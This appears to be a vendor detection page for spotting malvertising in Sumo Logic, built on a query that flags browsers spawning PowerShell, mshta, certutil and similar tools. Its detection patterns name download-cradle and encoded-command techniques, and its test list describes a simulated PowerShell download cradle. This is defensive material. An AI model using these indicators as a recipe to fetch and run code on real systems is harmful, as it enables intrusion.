Detect Malvertising in Sumo Logic CSE
Adversaries may purchase online advertisements to distribute malware to victims. Ads can be positioned prominently in search results or on popular websites, exploiting user trust in those platforms. Malvertising campaigns frequently spoof legitimate software vendors, tricking users into downloading trojanized installer packages. Because the adversary's infrastructure purchase occurs entirely outside the victim environment, detection must pivot to observable victim-side indicators: browsers spawning unexpected child processes, executable file downloads staged in user-writable directories, and drive-by script execution patterns consistent with clicking a malicious ad.
MITRE ATT&CK
- Tactic
- Resource Development
- Technique
- T1583 Acquire Infrastructure
- Sub-technique
- T1583.008 Malvertising
- Canonical reference
- https://attack.mitre.org/techniques/T1583/008/
Sumo Detection Query
_sourceCategory="os/windows/sysmon" OR _sourceCategory="os/windows/security"
| where EventID = "1" OR EventID = "4688"
| parse regex field=_raw "(?i)ParentImage[=:]\s*(?:[^\"\s]*\\\\)?(?P<parent_image>[^\\\"\s\r\n]+)" nodrop
| parse regex field=_raw "(?i)(?:Image|NewProcessName)[=:]\s*(?:[^\"\s]*\\\\)?(?P<child_image>[^\\\"\s\r\n]+)" nodrop
| parse regex field=_raw "(?i)(?:CommandLine|ProcessCommandLine)[=:]\s*(?P<command_line>[^\r\n]+)" nodrop
| parse regex field=_raw "(?i)(?:CurrentDirectory|WorkingDirectory)[=:]\s*(?P<working_dir>[^\r\n]+)" nodrop
| where (parent_image matches /(?i)(chrome|msedge|firefox|iexplore|opera|brave)\.exe/)
| where (child_image matches /(?i)(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|regsvr32|msiexec|certutil|bitsadmin)\.exe/)
| eval DownloadPath = if (working_dir matches /(?i)(\\Downloads\\|\\Temp\\|AppData\\Local\\Temp)/, 1, 0)
| eval NetworkRef = if (command_line matches /(?i)(http:\/\/|https:\/\/|ftp:\/\/)/, 1, 0)
| eval EncodedOrDL = if (command_line matches /(?i)(-enc|-encodedcommand|\biex\b|downloadstring|downloadfile|webclient|invoke-webrequest)/, 1, 0)
| eval HiddenOrSilent = if (command_line matches /(?i)(-windowstyle\s+hidden|-w\s+hidden|\/quiet|\/silent|\/verysilent)/, 1, 0)
| eval SuspicionScore = DownloadPath + NetworkRef + EncodedOrDL + HiddenOrSilent + 1
| fields _messageTime, _sourceHost, parent_image, child_image, command_line, working_dir, DownloadPath, NetworkRef, EncodedOrDL, HiddenOrSilent, SuspicionScore
| sort by SuspicionScore desc, _messageTime descSumo Logic query targeting Sysmon Event ID 1 and Security Event ID 4688 log sources to detect browser processes spawning suspicious child processes indicative of malvertising. Regex-based field extraction pulls parent image, child image, command line, and working directory from raw XML event data. Four boolean risk factors are evaluated and summed into a suspicion score, matching the reference KQL/SPL triage logic. Results are sorted by score for analyst prioritisation.
Data Sources
Required Tables
False Positives & Tuning
- Browser-based single sign-on (SSO) flows that trigger Windows installer processes, particularly when enterprise software is provisioned via an internal web portal that calls msiexec.exe silently.
- Automated browser testing frameworks (Selenium Grid, Playwright on Windows CI agents) where the test runner parent is a browser process and helper scripts are cmd.exe or powershell.exe.
- Built-in browser download-and-run prompts for legitimate software (e.g., Zoom, Teams client updates) where the browser directly spawns the installer in the Downloads folder.
Other platforms for T1583.008
Testing Methodology
Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1Simulate Browser Spawning PowerShell (Malvertising Drive-by Pattern)
Expected signal: Sysmon Event ID 1: Process Create with Image=powershell.exe, ParentImage=cmd.exe, CommandLine containing '-WindowStyle Hidden'. Sysmon Event ID 11: File Create for malv-test.txt in Temp. Security Event ID 4688 (if command line auditing enabled). PowerShell ScriptBlock Log Event ID 4104 showing Write-Output command.
- Test 2Stage and Execute Trojanized Installer from Downloads Folder
Expected signal: Sysmon Event ID 11: File Create for 7zip-2400-x64.exe in the Downloads folder. Sysmon Event ID 1: Process Create with Image path inside the Downloads folder — anomalous for any legitimate software. Security Event ID 4688 if command line auditing is enabled.
- Test 3HTA Drive-by Execution Simulating Malvertising Redirect
Expected signal: Sysmon Event ID 1: Process Create for mshta.exe with TargetFilename in Temp path. Sysmon Event ID 11: File Create for hta-atomic.txt. Security Event ID 4688 for mshta.exe execution. If launched from a browser parent, the main detection fires on mshta.exe as a SuspiciousChild with DownloadPath=1.
- Test 4PowerShell Download Cradle Spawned from Browser Context (Simulated Raspberry Robin Pattern)
Expected signal: Sysmon Event ID 1: Process Create for powershell.exe, ParentImage=cmd.exe, CommandLine containing 'Net.WebClient' and 'DownloadString'. Sysmon Event ID 3: Network connection attempt to 127.0.0.1:18080 (connection refused, but event still fires). PowerShell ScriptBlock Log Event ID 4104 showing the download cradle code.
References (7)
- https://attack.mitre.org/techniques/T1583/008/
- https://www.spamhaus.com/resource-center/a-surge-of-malvertising-across-google-ads-is-distributing-dangerous-malware/
- https://labs.guard.io/masquerads-googles-ad-words-massively-abused-by-threat-actors-targeting-organizations-gpus-42ae73ee8a1e
- https://www.ic3.gov/Media/Y2022/PSA221221
- https://www.sentinelone.com/blog/breaking-down-the-seo-poisoning-attack-how-attackers-are-hijacking-search-results/
- https://www.bbc.com/news/technology-12891182
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1583.008/T1583.008.md
Unlock Pro Content
Get the full detection package for T1583.008 including response playbook, investigation guide, and atomic red team tests.